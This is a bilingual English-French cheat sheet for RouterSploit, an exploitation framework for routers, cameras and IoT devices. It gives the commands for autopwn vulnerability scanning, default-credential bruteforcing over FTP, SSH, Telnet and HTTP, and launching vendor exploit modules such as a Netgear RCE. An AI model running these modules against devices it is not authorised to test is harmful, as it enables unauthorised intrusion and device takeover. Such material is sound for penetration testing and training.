RouterSploit

Framework d'exploitation pour périphériques embarqués et routeurs. Inclut des scanners pour plus de 200 CVE et des exploits ciblant des équipements réseau de Cisco, Netgear, Linksys, D-Link et autres. Exploitation framework for embedded devices and routers. Includes scanners for 200+ CVEs and exploits targeting network equipment from Cisco, Netgear, Linksys, D-Link, and others.

↗ https://github.com/threat9/routersploit

Overview

RouterSploit is a Metasploit-like framework specifically for embedded devices — routers, cameras, switches, and IoT devices. It includes credential scanners, vulnerability scanners, and exploits targeting known CVEs in popular consumer and enterprise network equipment.

Launch

# Start RouterSploit
sudo rsf
# or
python3 rsf.py

Module Structure

exploits/    CVE-specific exploits for specific devices
scanners/    Scan for vulnerable devices
creds/       Default credential bruteforcers
payloads/    Shellcode/payloads for exploits
generic/     Generic web-based attacks

Scanner Usage

# Auto-scan a target for all known vulnerabilities
rsf > use scanners/autopwn
rsf (AutoPwn) > set target 10.10.10.1
rsf (AutoPwn) > run

# Scan for specific vendor
rsf > use scanners/routers/router_scan
rsf (RouterScan) > set target 10.10.10.1
rsf (RouterScan) > run

# Check for default credentials
rsf > use creds/routers/multi_creds
rsf (MultiCreds) > set target 10.10.10.1
rsf (MultiCreds) > run

# HTTP default credentials
rsf > use creds/http/http_default_creds
rsf (HTTPDefaultCreds) > set target 10.10.10.1
rsf (HTTPDefaultCreds) > set port 8080
rsf (HTTPDefaultCreds) > run

Using Exploits

List all exploits

rsf > use exploits/

→ Tab-complete to browse

# Example: Netgear RCE
rsf > use exploits/routers/netgear/rce
rsf (Netgear RCE) > show options
rsf (Netgear RCE) > set target 192.168.1.1
rsf (Netgear RCE) > check     # Verify vulnerability
rsf (Netgear RCE) > run       # Exploit

# Example: Cisco exploit
rsf > use exploits/routers/cisco/cisco_ios_http_unauthorized_access
rsf (Cisco) > set target 10.10.10.1
rsf (Cisco) > run

Common Module Categories

# Router exploits (vendor-specific)
exploits/routers/cisco/
exploits/routers/netgear/
exploits/routers/dlink/
exploits/routers/linksys/
exploits/routers/asus/
exploits/routers/tplink/
exploits/routers/huawei/

# Camera exploits
exploits/cameras/dahua/
exploits/cameras/hikvision/
exploits/cameras/axis/

# NAS devices
exploits/nas/seagate/
exploits/nas/synology/

# Generic
generic/ftp_default_creds
generic/ssh_default_creds
generic/telnet_default_creds

Credential Scanners

# FTP default credentials
rsf > use creds/ftp/ftp_default_creds
rsf > set target 10.10.10.1
rsf > run

# SSH default creds
rsf > use creds/ssh/ssh_default_creds
rsf > set target 10.10.10.1
rsf > run

# Telnet default creds
rsf > use creds/telnet/telnet_default_creds
rsf > set target 10.10.10.1
rsf > run

# HTTP form default creds
rsf > use creds/http/http_form_default_creds
rsf > set target 10.10.10.1
rsf > set port 80
rsf > run

Tips

  • scanners/autopwn is the fastest way to identify vulnerabilities — run it first
  • Many router exploits require the web interface to be accessible (port 80/443/8080)
  • Default credential attacks are surprisingly effective — many IoT devices ship with unchanged defaults
  • Combine with nmap discovery to build a target list before running RouterSploit
Key commands
rsf > show modules          List all modules
rsf > use <module>          Load module
rsf > show options          Show configurable options
rsf > set <option> <value>  Set option
rsf > check                 Check if target is vulnerable (no exploit)
rsf > run                   Execute the module
rsf > back                  Return to main menu
rsf > search <term>         Search modules by keyword
rsf > exit                  Quit

Vue d’ensemble

RouterSploit est un framework façon Metasploit spécifiquement dédié aux périphériques embarqués : routeurs, caméras, switches et objets IoT. Il inclut des scanners d’identifiants, des scanners de vulnérabilités et des exploits ciblant des CVE connues dans des équipements réseau grand public et professionnels populaires.

Lancement

# Démarrer RouterSploit
sudo rsf
# ou
python3 rsf.py

Structure des modules

exploits/    Exploits spécifiques à une CVE pour des périphériques donnés
scanners/    Scanner à la recherche de périphériques vulnérables
creds/       Bruteforceurs d'identifiants par défaut
payloads/    Shellcodes/payloads pour les exploits
generic/     Attaques web génériques

Utilisation des scanners

# Auto-scanner une cible pour toutes les vulnérabilités connues
rsf > use scanners/autopwn
rsf (AutoPwn) > set target 10.10.10.1
rsf (AutoPwn) > run

# Scanner pour un fabricant spécifique
rsf > use scanners/routers/router_scan
rsf (RouterScan) > set target 10.10.10.1
rsf (RouterScan) > run

# Vérifier les identifiants par défaut
rsf > use creds/routers/multi_creds
rsf (MultiCreds) > set target 10.10.10.1
rsf (MultiCreds) > run

# Identifiants HTTP par défaut
rsf > use creds/http/http_default_creds
rsf (HTTPDefaultCreds) > set target 10.10.10.1
rsf (HTTPDefaultCreds) > set port 8080
rsf (HTTPDefaultCreds) > run

Utilisation des exploits

Lister tous les exploits

rsf > use exploits/

→ Utiliser la complétion par tabulation pour parcourir

# Exemple : RCE Netgear
rsf > use exploits/routers/netgear/rce
rsf (Netgear RCE) > show options
rsf (Netgear RCE) > set target 192.168.1.1
rsf (Netgear RCE) > check     # Vérifier la vulnérabilité
rsf (Netgear RCE) > run       # Exploiter

# Exemple : exploit Cisco
rsf > use exploits/routers/cisco/cisco_ios_http_unauthorized_access
rsf (Cisco) > set target 10.10.10.1
rsf (Cisco) > run

Catégories de modules courantes

# Exploits routeurs (spécifiques au fabricant)
exploits/routers/cisco/
exploits/routers/netgear/
exploits/routers/dlink/
exploits/routers/linksys/
exploits/routers/asus/
exploits/routers/tplink/
exploits/routers/huawei/

# Exploits caméras
exploits/cameras/dahua/
exploits/cameras/hikvision/
exploits/cameras/axis/

# Périphériques NAS
exploits/nas/seagate/
exploits/nas/synology/

# Génériques
generic/ftp_default_creds
generic/ssh_default_creds
generic/telnet_default_creds

Scanners d’identifiants

# Identifiants FTP par défaut
rsf > use creds/ftp/ftp_default_creds
rsf > set target 10.10.10.1
rsf > run

# Identifiants SSH par défaut
rsf > use creds/ssh/ssh_default_creds
rsf > set target 10.10.10.1
rsf > run

# Identifiants Telnet par défaut
rsf > use creds/telnet/telnet_default_creds
rsf > set target 10.10.10.1
rsf > run

# Identifiants par défaut de formulaire HTTP
rsf > use creds/http/http_form_default_creds
rsf > set target 10.10.10.1
rsf > set port 80
rsf > run

Conseils

  • scanners/autopwn est le moyen le plus rapide d’identifier des vulnérabilités : le lancer en premier
  • De nombreux exploits routeurs nécessitent que l’interface web soit accessible (port 80/443/8080)
  • Les attaques par identifiants par défaut sont étonnamment efficaces : de nombreux périphériques IoT sont livrés avec des identifiants jamais changés
  • Combiner avec une découverte nmap pour construire une liste de cibles avant de lancer RouterSploit
Commandes clés
rsf > show modules          List all modules
rsf > use <module>          Load module
rsf > show options          Show configurable options
rsf > set <option> <value>  Set option
rsf > check                 Check if target is vulnerable (no exploit)
rsf > run                   Execute the module
rsf > back                  Return to main menu
rsf > search <term>         Search modules by keyword
rsf > exit                  Quit